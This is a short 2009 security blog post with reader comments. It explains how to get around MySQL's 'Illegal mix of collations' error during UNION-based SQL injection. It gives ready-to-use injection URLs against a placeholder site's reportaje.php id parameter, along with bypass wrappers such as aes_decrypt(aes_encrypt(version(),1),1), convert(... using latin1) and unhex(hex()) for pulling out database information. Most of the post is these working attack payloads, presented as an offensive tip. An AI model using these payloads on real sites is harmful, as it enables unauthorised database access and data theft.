SOLUCION ERROR : "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'"
Error:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Soluciones:
aes_decrypt(aes_encrypt(version(),1),1)<br />convert(version() using latin1)
Example :
ERROR : http://www.xxx.com/reportaje.php?id=1+and+1=0+union+select+all+1,2,version(),4,5
SOLUCION : http://www.xxx.com/reportaje.php?id=1+and+1=0+union+select+all+1,2,aes_decrypt(aes_encrypt(version(),1),1),4,5
转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:SOLUCION ERROR : "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'"
本文地址:http://www.woyigui.cn/2009/09/10/aes_encrypt-aes_decrypt/
分类: 网络安全
unhex(hex(version()))
[回复]
woyigui 回复:
九月 12th, 2009 at 下午 2:33
thx…
[回复]
en,见heige n年前的老文
[回复]